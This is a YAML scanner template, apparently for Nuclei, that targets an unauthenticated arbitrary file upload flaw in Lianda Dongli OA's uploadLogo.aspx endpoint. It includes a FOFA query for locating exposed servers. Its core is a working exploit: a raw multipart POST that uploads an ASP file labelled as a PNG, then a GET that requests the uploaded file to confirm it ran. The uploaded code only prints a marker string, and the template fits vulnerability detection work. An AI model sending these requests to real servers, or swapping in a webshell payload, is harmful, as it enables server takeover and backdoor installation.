id: liandadongliOA-uploadLogo_aspx-File-upload

info:
  name: 联达动力OA uploadLogo.aspx 任意文件上传漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: (body="/LKSys_WindowControlScript.js" || body="onload=\"LKSYS_PubMaxWin()" || body="id=\"lkbLogin\" href=\"javascript:__doPostBack('lkbLogin','')" || (body="IdentityValidator" && body="HHCtrlMax"))
    联达动力OA uploadLogo.aspx 接口处存在任意文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
  reference:
    - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247488382&idx=1&sn=e12d0af13d72265698d9b271bfdaf830&chksm=c267a64df5102f5bde4d667b4c427c44fb40041cab7704bf3effbf25dcd2712906f1538e3d19&token=377357801&lang=zh_CN#rd
  tags: File upload

variables:
  username: "{{to_lower(rand_base(6))}}" #从可选字符集（默认为字母和数字）生成给定长度字符串的随机序列

http:
  - raw:
      - |
        POST /Hosp_Portal/uploadLogo.aspx HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
        Content-Type: multipart/form-data; boundary=d0b7a0d40eed0e32904c8017b09eb305

        --d0b7a0d40eed0e32904c8017b09eb305
        Content-Disposition: form-data; name="DesignId"
        
        1
        --d0b7a0d40eed0e32904c8017b09eb305
        Content-Disposition: form-data; name="Filedata"; filename="{{username}}.asp"
        Content-Type: image/png

        <% Response.Write("pboyjnnrfipmplsukdeczudsefxmywe") %>
        --d0b7a0d40eed0e32904c8017b09eb305--
  - raw:
      - |
        GET /Hosp_Portal/Logo/{{username}}.asp HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'pboyjnnrfipmplsukdeczudsefxmywe'
      - type: status
        status: 
          - 200